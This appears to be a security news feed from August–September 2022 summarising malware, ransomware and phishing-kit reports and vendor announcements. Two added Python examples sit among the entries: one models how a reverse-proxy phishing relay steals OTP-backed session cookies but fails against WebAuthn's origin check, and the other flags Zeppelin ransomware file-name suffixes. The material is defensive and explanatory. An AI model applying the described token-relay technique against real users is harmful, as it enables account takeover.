      SymphonyAI Industrial has launched KPI 360, an AI-driven solution that uses real-time data monitoring and prediction to help manufacturing companies view different operational data sources through a single, intelligent dashboard that sets up in hours. Backed by SymphonyAI’s Eureka industrial AI platform, KPI 360 lets any type of user set up monitoring for strategic KPIs through a visual, no-code builder interface. Leveraging SymphonyAI Industrial’s proprietary domain knowledge engine, KPI 360 comes with pre-built KPIs for … More

      The post SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard appeared first on Help Net Security.

      "

      Autosummary: “Flexibility and extensibility are built into KPI 360, so our customers can choose the visualization of their choice, link it to one or more KPIs, configure interactions with the visualizations, and change the visual appearance without writing a single line of code,” Gallello continued.


      New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices

      exploits industry
      2022-09-07 https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
      A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads. "An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist," AT&T Alien Labs said in a new report published Tuesday. The findings add to a "



      AkinovA’s clients can now benefit from CyberCube’s modeling and analytics

      industry
      2022-09-07 https://www.helpnetsecurity.com/2022/09/08/cybercube-akinova/

      CyberCube has partnered with AkinovA, to enable AkinovA’s clients to benefit from CyberCube’s modeling and analytics. The partnership will see CyberCube’s products made available to AkinovA’s platform. In doing so, the entire value chain of the risk transfer sector can gain access to CyberCube’s models. CyberCube’s models are based on cyber risk scenarios including ransomware attacks, cloud outages and major systemic risks to support the insurance, reinsurance and Insurance-Linked Securities (ILS) organisations to make better … More

      The post AkinovA’s clients can now benefit from CyberCube’s modeling and analytics appeared first on Help Net Security.

      "

      Autosummary: Henri Winand, AkinovA CEO, commented: “In 2020, AkinovA pioneered first-of-a-kind Cloud outage and cyber-induced electricity power generation downtime risk transfers together with AkinovA ecosystem partners, including a leading broker and underwriting capital.”


      Ant Group supports industrial collaborations in the digital economy with more accessible AI

      industry
      2022-09-06 https://www.helpnetsecurity.com/2022/09/06/ant-group-three-initiatives/

      Ant Group has unveiled three initiatives to make trusted AI more accessible. This includes making its graph processing database TuGraph open source; launching an AI security testing platform; and a privacy-preserving computation open platform. Announced at the World Artificial Intelligence Conference (“WAIC”) in Shanghai, these actions aim to make trusted AI solutions more accessible to enable industrial multi-party collaborations in the digital economy. A growing number of industries have been adopting AI technology at a … More

      The post Ant Group supports industrial collaborations in the digital economy with more accessible AI appeared first on Help Net Security.

      "

      Autosummary: “We believe that Privacy-Preserving Computation, Blockchain, Graph-Processing Technology, Distributed Database and Green Computing are the fundamental technologies for a large-scale industrial application of AI in the digital economy.”


      New EvilProxy service lets all hackers use advanced phishing tactics

      financial industry
      2022-09-05 https://www.bleepingcomputer.com/news/security/new-evilproxy-service-lets-all-hackers-use-advanced-phishing-tactics/
      A reverse-proxy Phishing-as-a-Service (PhaaS) platform called EvilProxy has emerged, promising to steal authentication tokens in order to bypass multi-factor authentication (MFA) on Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI. [...]

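      The technique behind the article is worth seeing next to the control that resists it: the kit sits as a reverse proxy between the victim and the real login page, relays password and one-time code, and keeps the session token the real site hands back once MFA completes. The Python below is an added example written for this page, not code from EvilProxy, from BleepingComputer, or from any of the providers listed; the two origins, the in-memory session store and the HMAC used as a stand-in for a WebAuthn credential's private-key signature are all constructed for illustration. It runs the same relayed flow through two login models: an OTP login that ends in a bearer cookie, which replays from the proxy because nothing binds it to the victim's browser, and an origin-bound assertion, which the server rejects because the victim's browser wrote the phishing origin into the signed client data.

```python
"""Why reverse-proxy (adversary-in-the-middle) phishing beats OTP MFA but not
origin-bound WebAuthn. Added example; everything here is a constructed model."""
import hashlib
import hmac
import json
import secrets
from typing import Optional, Tuple

RP_ORIGIN = "https://login.example.com"               # assumed legitimate origin
PHISH_ORIGIN = "https://login-example.com.evil.test"  # assumed proxy's origin

# --- Model 1: password + OTP, ending in a bearer session cookie ----------------
_sessions = set()  # constructed in-memory session store


def issue_session_after_otp(password_ok: bool, otp_ok: bool) -> Optional[str]:
    """Server side: if password and one-time code both check out, mint a token.
    The token is a bearer secret: whoever presents it is logged in."""
    if not (password_ok and otp_ok):
        return None
    token = secrets.token_hex(16)
    _sessions.add(token)
    return token


def session_is_valid(token: Optional[str]) -> bool:
    return token is not None and token in _sessions


def aitm_relay_otp_login(password_ok: bool, otp_ok: bool) -> Optional[str]:
    """Reverse proxy: forwards the victim's password and OTP to the real site
    and keeps the Set-Cookie it receives. Nothing ties the cookie to the
    victim's browser, so the attacker can replay it from anywhere."""
    return issue_session_after_otp(password_ok, otp_ok)


# --- Model 2: origin-bound assertion (WebAuthn-style) ---------------------------
def client_sign(cred_key: bytes, challenge: str, browser_origin: str) -> Tuple[str, str]:
    """Client side. The browser, not the web page, writes the origin the user is
    actually on into clientData; the authenticator signs a hash of it.
    HMAC stands in for the credential's asymmetric signature (a simplification)."""
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": browser_origin},
        sort_keys=True,
    )
    digest = hashlib.sha256(client_data.encode()).digest()
    sig = hmac.new(cred_key, digest, hashlib.sha256).hexdigest()
    return client_data, sig


def verify_assertion(cred_key: bytes, expected_challenge: str, client_data: str, sig: str) -> bool:
    """Relying party side: the origin check is what defeats the proxy."""
    try:
        data = json.loads(client_data)
    except ValueError:
        return False
    if data.get("type") != "webauthn.get":
        return False
    if data.get("origin") != RP_ORIGIN:          # signed origin must be ours
        return False
    challenge = data.get("challenge")
    if not isinstance(challenge, str) or not hmac.compare_digest(challenge, expected_challenge):
        return False
    digest = hashlib.sha256(client_data.encode()).digest()
    expected_sig = hmac.new(cred_key, digest, hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected_sig)


def legitimate_webauthn_login(cred_key: bytes, challenge: str) -> bool:
    client_data, sig = client_sign(cred_key, challenge, RP_ORIGIN)
    return verify_assertion(cred_key, challenge, client_data, sig)


def aitm_relay_webauthn_login(cred_key: bytes, challenge: str) -> bool:
    """Proxy forwards the RP's challenge to the victim; the victim's browser signs
    with origin=PHISH_ORIGIN because that is where it is. Relaying the assertion
    unchanged fails the origin check, and the proxy cannot re-sign it."""
    client_data, sig = client_sign(cred_key, challenge, PHISH_ORIGIN)
    return verify_assertion(cred_key, challenge, client_data, sig)


if __name__ == "__main__":
    stolen_cookie = aitm_relay_otp_login(password_ok=True, otp_ok=True)
    print("OTP MFA, cookie replayed by proxy:", session_is_valid(stolen_cookie))
    key = secrets.token_bytes(32)            # constructed credential key
    chal = secrets.token_urlsafe(32)
    print("WebAuthn, legitimate login:", legitimate_webauthn_login(key, chal))
    print("WebAuthn, relayed via proxy:", aitm_relay_webauthn_login(key, chal))
```

      The session-cookie model is the one every provider in the article's list shares once a user has passed a code-based or push-based second factor; the proxy never needs the password hash or the OTP seed, only the cookie. The origin check is the property that makes FIDO2/WebAuthn phishing-resistant: the proxy can relay bytes but cannot change the origin the browser records without invalidating the signature.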


      BlackCat ransomware claims attack on Italian energy agency

      exploits ransomware industry
      2022-09-02 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-attack-on-italian-energy-agency/
      The BlackCat/ALPHV ransomware gang claimed responsibility for an attack that hit the systems of Italy's energy agency Gestore dei Servizi Energetici SpA (GSE) over the weekend. [...]

      Autosummary: The attackers say that the stolen files contain confidential data, including contracts, reports, project information, accounting documents, and other internal documentation.


      Dealing with cyber threats in the energy sector: Are we on the right path?

      industry
      2022-09-01 https://www.helpnetsecurity.com/2022/09/01/cyber-threats-energy-sector/

      In this interview for Help Net Security, Katie Taitler, Senior Cybersecurity Strategist at Axonius, talks about cyber threats in the energy sector and what should be improved to make sure this sector is properly guarded. We have witnessed numerous cyberattacks on the energy sector in the past few years. What could be the consequences of such attacks? Attacks on the energy sector are often a show of power, meant to cause large-scale disruption. … More

      The post Dealing with cyber threats in the energy sector: Are we on the right path? appeared first on Help Net Security.

      "

      Autosummary: It always starts with the fundamentals and knowing your baselines: what technology do you have, where is it, what state is it in, how can it be attacked, what vulnerabilities might criminals take advantage of, can they be patched, what are the priorities? Energy organizations need to devote time and energy, and collaborate better with the private sector, to seek out research and best practices and establish improved information sharing among organizations.


      7 metrics to measure the effectiveness of your security operations

      industry
      2022-09-01 https://www.helpnetsecurity.com/2022/09/01/7-metrics-measure-effectiveness-security-operations-video/

      Given inflation and economic uncertainty, the cybersecurity industry is starting to experience budget cuts, despite a surge in ransomware attacks. As more budgets are going under the microscope, and in some cases, on the chopping block, one of the best ways for security leaders to protect their program is to ensure alignment with their executive teams and boards. In this Help Net Security video, Andrew Hollister, CSO at LogRhythm, talks about measuring the effectiveness of … More

      The post 7 metrics to measure the effectiveness of your security operations appeared first on Help Net Security.

      "

      Autosummary: "


      Secureworks partners with Netskope and SCADAfence to protect users against threats

      industry
      2022-08-31 https://www.helpnetsecurity.com/2022/09/01/secureworks-netskope-scadafence/

      Secureworks announced the expansion of its alliances program into several new solution areas. With threats expanding into critical production environments and the service edge, detection capabilities must expand, too. Through two new partners, Netskope and SCADAfence, Secureworks widens the range of potential security vulnerabilities addressed by Secureworks Taegis XDR to include Secure Access Service Edge (SASE), Operational Technology (OT), and Industrial Control Systems (ICS). Now, more organizations than ever can benefit from better detection with … More

      The post Secureworks partners with Netskope and SCADAfence to protect users against threats appeared first on Help Net Security.

      "

      Autosummary: “Hybrid work is the new normal, and our customers look for complete SASE solutions to enable performance, deliver data, protect against threats, and maximize return on investment,” said Andy Horwitz, VP of Business Development at Netskope.


      Threat actors breached the network of the Italian oil company ENI

      industry
      2022-08-31 https://securityaffairs.co/wordpress/135116/hacking/eni-suffered-cyberattack.html

      Italian oil giant Eni disclosed a security breach: threat actors gained access to its computer networks, but according to the company the intrusion had minor consequences because it was quickly detected. “The internal […]

      The post Threat actors breached the network of the Italian oil company ENI appeared first on Security Affairs.

      "

      Autosummary: Last year, Alpharetta, Georgia-based Colonial Pipeline Co. shut the largest fuel pipeline in the US after a ransomware attack crippled its IT systems, and in February, Hamburg, Germany-based oil trader Mabanaft said it was the victim of a cyberattack that disrupted the delivery of fuels across Germany.


      DDoS activity launched by patriotic hacktivists is on the rise

      industry
      2022-08-30 https://www.helpnetsecurity.com/2022/08/30/malicious-ddos-attacks-video/

      Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. This Help Net Security video provides information about the rise of DDoS activity launched by patriotic hacktivists.

      The post DDoS activity launched by patriotic hacktivists is on the rise appeared first on Help Net Security.

      "

      Autosummary: "


      Rise in IoT vulnerability disclosures, up 57%

      exploits industry
      2022-08-29 https://www.helpnetsecurity.com/2022/08/29/vulnerability-disclosures-iot-devices/

      Vulnerability disclosures impacting IoT devices increased by 57% in the first half (1H) of 2022 compared to the previous six months, according to research by Claroty. The report also found that over the same period, vendor self-disclosures increased by 69%, making vendors more prolific reporters than independent research outfits for the first time, and that fully or partially remediated firmware vulnerabilities increased by 79%, a notable improvement given the relative challenges in patching firmware versus … More

      The post Rise in IoT vulnerability disclosures, up 57% appeared first on Help Net Security.

      "

      Autosummary: Vendor self-disclosures: For the first time, vendor self-disclosures (29%) have surpassed independent research outfits (19%) as the second most prolific vulnerability reporters, after third-party security companies (45%).


      Attackers changing targets from large hospitals to specialty clinics

      industry
      2022-08-29 https://www.helpnetsecurity.com/2022/08/29/data-breach-healthcare-organizations/

      Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes breach data reported to the United States Department of Health and Human Services by healthcare organizations. With the healthcare industry continuing to be a top target for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data … More

      The post Attackers changing targets from large hospitals to specialty clinics appeared first on Help Net Security.

      "

      Autosummary: With the healthcare industry continuing to be a top target for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data but also have more sophisticated defenses, to smaller hospital systems and specialty clinics that lack the same level of security preparedness, staff size, or budget. "


      Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies

      industry
      2022-08-26 https://www.helpnetsecurity.com/2022/08/26/alteryx-server-fips/

      Alteryx announced Alteryx Server-FIPS, a version of its Server offering that is aligned with the Federal Information Processing Standards (FIPS) for data security and computer systems. The launch of Server-FIPS is monumental for the use of analytics in public sector environments that require enhanced data encryption. Alteryx Server-FIPS is a FIPS-capable and scalable server-based product for scheduling, sharing, and running apps and models created in Alteryx Designer-FIPS for others in the organization to leverage. This … More

      The post Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies appeared first on Help Net Security.

      "

      Autosummary: "


      How fast is the financial industry fixing its software security flaws?

      financial industry
      2022-08-26 https://www.helpnetsecurity.com/2022/08/26/financial-software-security-flaws/

      Veracode released data revealing that the financial services industry ranks among the best for overall flaw percentage when compared to other industries, but has one of the lowest fix rates for software security flaws. The sector also falls to the middle of the pack for high-severity flaws, with 18 percent of applications containing a serious vulnerability, suggesting financial firms should prioritize identifying and remediating the flaws that matter most. The findings were outlined in the … More

      The post How fast is the financial industry fixing its software security flaws? appeared first on Help Net Security.

      "

      Autosummary: Although the finance sector outperforms most other industries in fix times for flaws discovered by dynamic, SCA, and static, the study found there is still ample room for continued improvement when looking at the number of days it takes to resolve 50 percent of flaws—116 days for dynamic analysis, 385 days for SCA, and 288 days for static analysis. "


      Exploits and TrickBot disrupt manufacturing operations

      exploits industry
      2022-08-25 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/exploits-and-trickbot-disrupt-manufacturing-operations

      Categories: Threat Intelligence

      September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. This is combined with heavy detections of unseen malware, identified through our AI engine, spiking in May as well as September 2021.

      (Read more...)

      The post Exploits and TrickBot disrupt manufacturing operations appeared first on Malwarebytes Labs.

      "

      Autosummary: Posted: August 25, 2022. September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. For example, the video card maker NVIDIA dealt with a significant attack in February 2022; March saw the infection of the tool manufacturer Snap-On Tools by Conti ransomware; in April there was an operation against General Motors; and in May, infiltration of the agricultural company, AGCO. "


      A major European logistics company selects IronNet to improve its operational security

      industry
      2022-08-25 https://www.helpnetsecurity.com/2022/08/26/ironnet-european-logistics-company/

      IronNet announced that a major European logistics company, offering courier, package delivery and express mail service, will deploy the IronNet Collective DefenseSM platform to help defend against increased cyber threats facing the sector. The logistics company is remaining anonymous to help protect its operational security. It serves millions of customers across Europe, provides pick-up and drop-off points for package and parcel services as well as door-to-door courier and fulfillment services for e-merchants. “Cyber attacks along … More

      The post A major European logistics company selects IronNet to improve its operational security appeared first on Help Net Security.

      "

      Autosummary: The security platform will enable the logistics company to leverage NDR capabilities, powered by behavioral analytics, to detect unknown threats on its network and, in turn, anonymously exchange visibility in real time with others in the Collective Defense community. "


      Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data

      industry
      2022-08-24 https://www.helpnetsecurity.com/2022/08/24/data-dynamics-storagex9-0/

      Data Dynamics released StorageX 9.0, expanding and enhancing the existing product functionality to help customers manage sprawling unstructured data and its complexities. It enables enterprises to categorize and analyze their data, draw actionable insights, apply security practices, maintain compliance, and enhance business performance. StorageX 9.0 is packed with new features, including Share and DFS analytics, NFSv4 and NFSv3 POSIX security translation, and support for versioned object mobility. “StorageX 9.0 is an enhancement to our … More

      The post Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data appeared first on Help Net Security.

      "

      Autosummary: "


      New social engineering tactics discovered in the wild

      industry
      2022-08-24 https://www.helpnetsecurity.com/2022/08/24/new-social-engineering-tactics-video/

      In this Help Net Security video, Otavio Freire, President and CTO at SafeGuard Cyber, offers insight on new social engineering tactics discovered in the wild, and illustrates how phishing attacks are changing, including how they’re evolving beyond email.

      The post New social engineering tactics discovered in the wild appeared first on Help Net Security.

      "

      Autosummary: "


      DDoS attacks jump 203%, patriotic hacktivism surges

      industry
      2022-08-23 https://www.helpnetsecurity.com/2022/08/23/malicious-ddos-attacks-climbed/

      Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. The report also underscores how Russia’s invasion of Ukraine has altered the focus of the threat landscape — shifting it from the consequences of the pandemic to a ground swell of DDoS activity launched by patriotic hacktivists. “The threat landscape saw a marked shift in the first half of 2022,” said Pascal … More

      The post DDoS attacks jump 203%, patriotic hacktivism surges appeared first on Help Net Security.

      "

      Autosummary: Major information and communication networks in the Philippines, including CNN, news network ABS-CBN, Rappler, and VERA Files, were the target of DDoS attacks in connection with the country’s 2022 general elections. Retail and high-tech top industries for most web attacks: During the first six months of 2022, there was an increase in malicious transactions targeting online applications, dominated by predictable resource location and injection attacks. "


      New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers

      financial exploits industry
      2022-08-20 https://thehackernews.com/2022/08/new-grandoreiro-banking-malware.html
      Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan.  "In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute " "

      Autosummary: "


      Grandoreiro banking malware targets manufacturers in Spain, Mexico

      financial exploits latam industry
      2022-08-19 https://www.bleepingcomputer.com/news/security/grandoreiro-banking-malware-targets-manufacturers-in-spain-mexico/
      The notorious "Grandoreiro" banking trojan was spotted in recent attacks targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico. [...] "

      Autosummary: The backdoor capabilities of the malware on the host include: keylogging; auto-updating to newer versions and modules; web injects and restricting access to specific websites; command execution; manipulating windows; guiding the victim's browser to a specific URL; C2 domain generation via a DGA (Domain Generation Algorithm); imitating mouse and keyboard movements. Outlook: the recent campaign indicates that Grandoreiro's operators are interested in conducting highly targeted attacks instead of sending large volumes of spam emails to random recipients. "


      The Week in Ransomware - August 19th 2022 - Evolving extortion tactics

      exploits ransomware industry
      2022-08-19 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-19th-2022-evolving-extortion-tactics/
      Bringing you the latest ransomware news, including new research, tactics, and cyberattacks. We also saw the return of the BlackByte ransomware operation, who has started to use new extortion tactics. [...] "

      Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @PolarToffee, @BleepinComputer, @Seifreed, @jorntvdw, @fwosar, @serghei, @struppigel, @FourOctets, @demonslay335, @malwrhunterteam, @Ionut_Ilascu, @malwareforme, @VK_Intel, @DanielGallagher, @juanbrodersen, @AlvieriD, @Cyberknow20, @Intel_by_KELA, @MauroEldritch, @luisezegarra, @Cleafy, and @pcrisk. "


      IoT: The huge cybersecurity blind spot that’s costing millions

      industry ciber
      2022-08-18 https://www.helpnetsecurity.com/2022/08/18/iot-cybersecurity-blind-spots/

      In many ways, IoT has made our lives easier. We are technologically connected in ways we never thought possible. But organizations need to be aware of the cybersecurity blind spots generated by the prevalence of IoT technology, because connected devices are opening virtual doors into organizations’ networks. The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices … More

      The post IoT: The huge cybersecurity blind spot that’s costing millions appeared first on Help Net Security.

      "

      Autosummary: The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices ending up in the end-product or system ecosystem – which is where the blind spot comes in. As an industry-recognized seal of approval, vendors and partners can be sure that the products they are working with meet the high standards they need, and create a strong, trusting relationship between them. "


      Business Services industry targeted across the country for backdoor access

      government industry
      2022-08-18 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/business-services-targeted-across-the-country-for-backdoor-access

      Categories: Threat Intelligence

      High detections of hacking tools for the Business Services industry shows that attackers likely sought to infect businesses and install backdoors for future access to their customers.

      (Read more...)

      The post Business Services industry targeted across the country for backdoor access appeared first on Malwarebytes Labs.

      "

      Autosummary: A subsequent spike of this threat in August 2021 coincides with three major attacks, likely achieved because of the success of CVE-2021-21551. These were the Kaseya breach, which spread REvil to hundreds of networks; the ransomware attack on consulting firm Accenture, with a $50 million ransom demand; and the T-Mobile data breach, which exposed the information of 50 million people. "


      TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats

      industry ciber
      2022-08-18 https://www.helpnetsecurity.com/2022/08/19/txone-networks-funding/

      TXOne Networks has entered into definitive agreements in connection with its Series B financing with total investment proceeds of $70 million. The latest capital injection will be used to expand TXOne Networks’ global presence and defend industry verticals worldwide against cybersecurity threats to industrial control systems (ICS). The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, … More

      The post TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats appeared first on Help Net Security.

      "

      Autosummary: The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, Ta Ya Venture Capital, Simplo Technology Group, CHT Security Corporation and Ash Tower Limited, as well as Steven Pan, Silks Hotel Group Chair, and Chun-I Wu, TAYIH Group Chair. "


      How attackers are exploiting corporate IoT

      exploits industry
      2022-08-17 https://www.helpnetsecurity.com/2022/08/17/how-attackers-are-exploiting-corporate-iot-video/

      In this Help Net Security video, Brian Contos, CSO at Phosphorus Cybersecurity, discusses how most companies consider IoT threats to be limited in scope. In actuality, a growing number of sophisticated adversaries are realizing the true value of IoT as an easy initial breach point to get access to the corporate network. These devices also enable them to achieve long-term persistence through network footholds that will avoid detection and survive remediation.

      The post How attackers are exploiting corporate IoT appeared first on Help Net Security.

      "

      Autosummary: "


      BlackByte ransomware gang is back with new extortion tactics

      exploits ransomware industry
      2022-08-17 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/
      The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. [...] "

      Autosummary: "


      New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks

      industry
      2022-08-16 https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html
      Cybersecurity researchers have detailed a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider "

      Autosummary: Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson. "


      Feds: Zeppelin Ransomware Resurfaces with New Compromise, Encryption Tactics

      exploits ransomware industry
      2022-08-12 https://threatpost.com/zeppelin-ransomware-resurfaces/180405/
      CISA has seen a resurgence of the malware, which targets a range of verticals and critical infrastructure organizations by exploiting RDP and firewall vulnerabilities. "

      Autosummary: Multiple encryption: Once Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file extension, e.g., file.txt.txt.C59-E0C-929, according to CISA. "
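The naming artifact above is something a responder can triage for directly. The following is an added example (my own code, not from the Threatpost article or from CISA's advisory) that scans a constructed file listing for the Zeppelin-style suffix, recovers the name the file had before the suffix was appended, and counts how many files carry each ID. The ID layout (three dash-separated groups of three hex digits) is taken from the advisory's single example; case-insensitive matching is my assumption.

```python
"""
Added example, not code from the article or CISA: flag files whose final
extension looks like Zeppelin's randomized nine-digit hexadecimal ID
(e.g. file.txt.txt.C59-E0C-929), recover the pre-suffix name and tally IDs.
"""
import re
from collections import Counter

# Three groups of three hex digits, as in the advisory's example "C59-E0C-929".
# Accepting lower-case hex is an assumption; the advisory only shows upper case.
ZEPPELIN_SUFFIX_RE = re.compile(
    r"^(?P<original>.+)\.(?P<id>[0-9A-Fa-f]{3}-[0-9A-Fa-f]{3}-[0-9A-Fa-f]{3})$"
)

# Constructed listing mixing hits, near-misses and clean files.
SAMPLE_LISTING = [
    "file.txt.txt.C59-E0C-929",   # the advisory's own example
    "report.docx.C59-E0C-929",    # same ID on a second file
    "notes.txt.1A2-B3C-4D5",      # a different ID
    "readme.md.123-456-789",      # digits only, still nine hex digits
    "photo.jpg.abc",              # three hex digits, wrong shape: no match
    "data.csv.GGG-111-222",       # 'G' is not a hex digit: no match
    "invoice.pdf",                # clean
]


def match_zeppelin_name(path):
    """Return (original_name, id) if the last extension looks Zeppelin-generated, else None."""
    # Work on the basename so Windows or POSIX directory separators do not matter.
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    m = ZEPPELIN_SUFFIX_RE.match(name)
    if not m:
        return None
    return m["original"], m["id"].upper()


def scan_listing(paths):
    """Collect every hit as (path, original_name, id) and count files per ID."""
    hits = []
    ids = Counter()
    for p in paths:
        r = match_zeppelin_name(p)
        if r:
            hits.append((p, r[0], r[1]))
            ids[r[1]] += 1
    return {"hits": hits, "ids": ids}


if __name__ == "__main__":
    result = scan_listing(SAMPLE_LISTING)
    for path, original, ext_id in result["hits"]:
        print(f"{path}: id {ext_id}, original name {original}")
    print("files per ID:", dict(result["ids"]))
```

Treat a match as a lead, not a verdict: a legitimately named file can fit the same shape, so confirm with file headers or entropy before acting, and keep the original-name recovery for inventorying what was hit rather than for renaming anything in place.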


      Cymulate improves risk visibility for businesses with new analytics capabilities

      industry
      2022-08-10 https://www.helpnetsecurity.com/2022/08/10/cymulate-xspm-platform/

      Cymulate announced the expansion of its Extended Security Posture Management (XSPM) Platform to include advanced insights and analytics capabilities. As businesses struggle to manage attack surfaces and validate security controls, these new data-driven capabilities significantly improve risk visibility and deliver actionable insights for reducing remediation time. Businesses also now gain enhanced levels of granularity for setting and tracking cybersecurity performance metrics and KPIs, which are required for improving cyber resilience. “Now, more than ever, organizations … More

      The post Cymulate improves risk visibility for businesses with new analytics capabilities appeared first on Help Net Security.

      "

      Autosummary: "


      OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats

      exploits industry
      2022-08-10 https://www.helpnetsecurity.com/2022/08/10/opswat-metadefender-malware-analyzer/

      OPSWAT announced new malware analysis capabilities for IT and OT at the Black Hat USA 2022 conference. These enhancements include OPSWAT Sandbox for OT with detection of malicious communications on OT network protocols and support for open-source third-party tools in its MetaDefender Malware Analyzer solution. With increased threats and growing concerns around propagation into OT networks within critical infrastructure environments, threat intelligence for both the IT and OT sides of the business is essential in … More

      The post OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats appeared first on Help Net Security.

      "

      Autosummary: "


      Automotive supplier breached by 3 ransomware gangs in 2 weeks

      exploits ransomware industry
      2022-08-10 https://www.bleepingcomputer.com/news/security/automotive-supplier-breached-by-3-ransomware-gangs-in-2-weeks/
      An automotive supplier had its systems breached and files encrypted by three different ransomware gangs over a two-week span in May, two of the attacks happening within just two hours. [...] "

      Autosummary: Breached three times within two months: After the initial compromise, LockBit, Hive, and ALPHV/BlackCat affiliates also gained access to the victim's network on April 20, May 1, and May 15, respectively. "


      NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities

      ransomware industry
      2022-08-09 https://www.helpnetsecurity.com/2022/08/09/netrise-platform/

      NetRise released the NetRise Platform, which provides insights into shared vulnerabilities across the XIoT firmware images in an organization. NetRise is a cloud-based SaaS platform that analyzes and monitors the firmware of XIoT devices. The firmware images are dissected, presenting all of the key data, artifacts, and risk in an easy-to-consume interface. As a result, NetRise reduces the time and cost of firmware security programs, allowing organizations to find and remediate previously undetected issues. … More

      The post NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities appeared first on Help Net Security.

      "

      Autosummary: NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: vulnerabilities (known and unknown); compliance adherence; software bill of materials (SBOM); misconfigurations; overall risk. Key features: vulnerability identification and monitoring; comprehensive SBOM; risk comparisons of new firmware versions to existing versions; vulnerability and other risk prioritization; correlation across all monitored devices; a firmware repository to query when new vulnerabilities are identified. “NetRise provides the perfect solution for mapping XIoT devices to traditional security processes,” said Michael Scott, Co-Founder & CTO of NetRise. "


      Chinese Hackers Targeted Dozens of Industrial Enterprises and Public Institutions

      industry
      2022-08-09 https://thehackernews.com/2022/08/chinese-hackers-targeted-dozens-of.html
      Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint "

      Autosummary: Other backdoors utilized in the attacks include nccTrojan, Cotx, DNSep, Logtu, and a previously undocumented malware dubbed as CotSam, so named owing to its similarities with Cotx. "


      Chinese actors behind attacks on industrial enterprises and public institutions

      industry
      2022-08-09 https://securityaffairs.co/wordpress/134180/apt/china-apt-attacks-industrial-enterprises.html

      China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public institutions in Afghanistan and Eastern Europe. The attackers breached dozens of enterprises and in some cases compromised their IT infrastructure, […]

      The post Chinese actors behind attacks on industrial enterprises and public institutions appeared first on Security Affairs.

      "

      Autosummary: The Portdoor backdoor implements multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, and AES-encrypted data exfiltration. "


      IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card

      industry
      2022-08-09 https://www.helpnetsecurity.com/2022/08/10/idex-biometrics-reltime/

